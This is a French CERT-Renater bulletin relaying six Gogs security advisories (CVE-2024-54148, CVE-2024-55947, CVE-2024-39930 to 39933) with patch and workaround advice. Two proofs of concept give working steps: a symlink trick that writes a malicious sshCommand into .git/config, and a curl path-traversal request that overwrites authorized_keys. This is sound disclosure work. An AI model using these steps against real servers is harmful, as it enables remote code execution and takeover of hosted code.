Ce mail provient de l'extérieur, restons vigilants ====================================================================== CERT-Renater Note d'Information No. 2024/VULN562 _____________________________________________________________________ DATE : 27/12/2024 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running Gogs versions prior to 0.13.1. ===================================================================== https://github.com/gogs/gogs/security/advisories/GHSA-r7j8-5h9c-f6fx https://github.com/gogs/gogs/security/advisories/GHSA-qf5v-rp47-55gg https://github.com/gogs/gogs/security/advisories/GHSA-vm62-9jw3-c8w3 https://github.com/gogs/gogs/security/advisories/GHSA-ccqv-43vm-4f3w https://github.com/gogs/gogs/security/advisories/GHSA-9pp6-wq8c-3w2c https://github.com/gogs/gogs/security/advisories/GHSA-m27m-h5gj-wwmg _____________________________________________________________________ Path Traversal in file editing UI Critical unknwon published GHSA-r7j8-5h9c-f6fx Dec 23, 2024 Package Gogs (Go) Affected versions <0.13.1 Patched versions 0.13.1 Description Impact The malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server. Patches Editing symlink while changing the file name has been prohibited via the repository web editor (#7857). Users should upgrade to 0.13.1 or the latest 0.14.0+dev. Workarounds No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions. References n/a Proof of Concept Create two repositories, upload something to the first repository, edit any file, and save it on the webpage. In the second repository, create a symbolic link to the file you need to edit: $ ln -s /data/gogs/data/tmp/local-repo/1/.git/config test $ ls -la total 8 drwxr-xr-x 5 dd staff 160 Oct 27 19:09 . drwxr-xr-x 4 dd staff 128 Oct 27 19:06 .. drwxr-xr-x 12 dd staff 384 Oct 27 19:09 .git -rw-r--r-- 1 dd staff 12 Oct 27 19:06 README.md lrwxr-xr-x 1 dd staff 44 Oct 27 19:09 test -> /data/gogs/data/tmp/local-repo/1/.git/config $ git add . $ git commit -m 'ddd' $ git push -f Go back to the webpage, edit the symbolic file in the second repository, with the following content, change the filename, and save (here you can notice, with filename changed the symbolic file edit limit is bypassed) [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = echo pwnned > /tmp/poc [remote "origin"] url = [git@github.com](mailto:git@github.com):torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master Go back to the first repo, edit something, and commit again, you can notice a file called /tmp/poc created on the server. For more information If you have any questions or comments about this advisory, please post on #7582. Severity Critical CVE ID CVE-2024-54148 Weaknesses CWE-20 Credits @ManassehZhou ManassehZhou Reporter _____________________________________________________________________ Path Traversal in file update API Critical unknwon published GHSA-qf5v-rp47-55gg Dec 23, 2024 Package gogs.io/gogs (Go) Affected versions <0.13.1 Patched versions 0.13.1 Description Impact The malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. Patches Writing files outside repository Git directory has been prohibited via the repository file update API (#7859). Users should upgrade to 0.13.1 or the latest 0.14.0+dev. Workarounds No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions. References n/a Proof of Concept Generate a Personal Access Tokens Edit any file on the server with this curl -v --path-as-is -X PUT --url "http://localhost:10880/api/v1/repos/Test/bbcc/contents/../../../../../../../../home/git/.ssh/authorized_keys" \ -H "Authorization: token eaac23cf58fc76bbaecd686ec52cd44d903db9bf" \ -H "Content-Type: application/json" \ --data '{ "message": "an", "content": "" }' ssh connect to remote server ssh -i temp git@localhost -p 10022 For more information If you have any questions or comments about this advisory, please post on #7582. Severity Critical CVE ID CVE-2024-55947 Weaknesses CWE-20 Credits @ManassehZhou ManassehZhou Reporter _____________________________________________________________________ Argument Injection in the built-in SSH server Critical unknwon published GHSA-vm62-9jw3-c8w3 Dec 23, 2024 Package gogs.io/gogs (Go) Affected versions <=0.13.0 Patched versions 0.13.1 Description Impact When the built-in SSH server is enabled ([server] START_SSH_SERVER = true), unprivileged user accounts with at least one SSH key can execute arbitrary commands on the Gogs instance with the privileges of the user specified by RUN_USER in the configuration. It allows attackers to access and alter any users' code hosted on the same instance. Patches The env command sent to the internal SSH server has been changed to be a passthrough (#7868), i.e. the feature is effectively removed. Users should upgrade to 0.13.1 or the latest 0.14.0+dev. Workarounds Disable the use of built-in SSH server on operating systems other than Windows. References https://www.cve.org/CVERecord?id=CVE-2024-39930 Severity Critical 10.0 / 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AC:L/AV:N/A:H/C:H/I:H/PR:L/S:C/UI:N CVE ID CVE-2024-39930 Weaknesses CWE-20 Credits @swapgs swapgs Reporter _____________________________________________________________________ Deletion of internal files Critical unknwon published GHSA-ccqv-43vm-4f3w Dec 23, 2024 Package gogs.io/gogs (Go) Affected versions <=0.13.0 Patched versions 0.13.1 Description Impact Unprivileged user accounts can execute arbitrary commands on the Gogs instance with the privileges of the account specified by RUN_USER in the configuration. It allows attackers to access and alter any users' code hosted on the same instance. Patches Deletion of .git files has been prohibited (#7870). Users should upgrade to 0.13.1 or the latest 0.14.0+dev. Workarounds No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions. References https://www.cve.org/CVERecord?id=CVE-2024-39931 Severity Critical 10.0/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AC:L/AV:N/A:H/C:H/I:H/PR:L/S:C/UI:N CVE ID CVE-2024-39931 Weaknesses CWE-20 Credits @swapgs swapgs Reporter _____________________________________________________________________ Argument Injection during changes preview Critical unknwon published GHSA-9pp6-wq8c-3w2c Dec 23, 2024 Package gogs.io/gogs (Go) Affected versions <=0.13.0 Patched versions 0.13.1 Description Impact Unprivileged user accounts can write to arbitrary files on the filesystem. We could demonstrate its exploitation to force a re-installation of the instance, granting administrator rights. It allows accessing and altering any user's code hosted on the same instance. Patches Unintended Git options has been ignored for diff preview (#7871). Users should upgrade to 0.13.1 or the latest 0.14.0+dev. Workarounds No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions. References https://www.cve.org/CVERecord?id=CVE-2024-39932 Severity Critical 10.0/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AC:L/AV:N/A:H/C:H/I:H/PR:L/S:C/UI:N CVE ID CVE-2024-39932 Weaknesses CWE-20 Credits @swapgs swapgs Reporter _____________________________________________________________________ Argument Injection when tagging new releases High unknwon published GHSA-m27m-h5gj-wwmg Dec 23, 2024 Package gogs.io/gogs (Go) Affected versions <=0.13.0 Patched versions 0.13.1 Description Impact Unprivileged user accounts with at least one SSH key can read arbitrary files on the system. For instance, they could leak the configuration files that could contain database credentials ([database] *) and [security] SECRET_KEY. Attackers could also exfiltrate TLS certificates, other users' repositories, and the Gogs database when the SQLite driver is enabled. Patches Unintended Git options has been ignored for creating tags (#7872). Users should upgrade to 0.13.1 or the latest 0.14.0+dev. Workarounds No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions. References https://www.cve.org/CVERecord?id=CVE-2024-39933 Severity High 10.0/ 10 CVSS v3 base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity None Availability None CVSS:3.1/AC:L/AV:N/A:N/C:H/I:N/PR:L/S:C/UI:N CVE ID CVE-2024-39933 Weaknesses CWE-20 Credits @swapgs swapgs Reporter ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================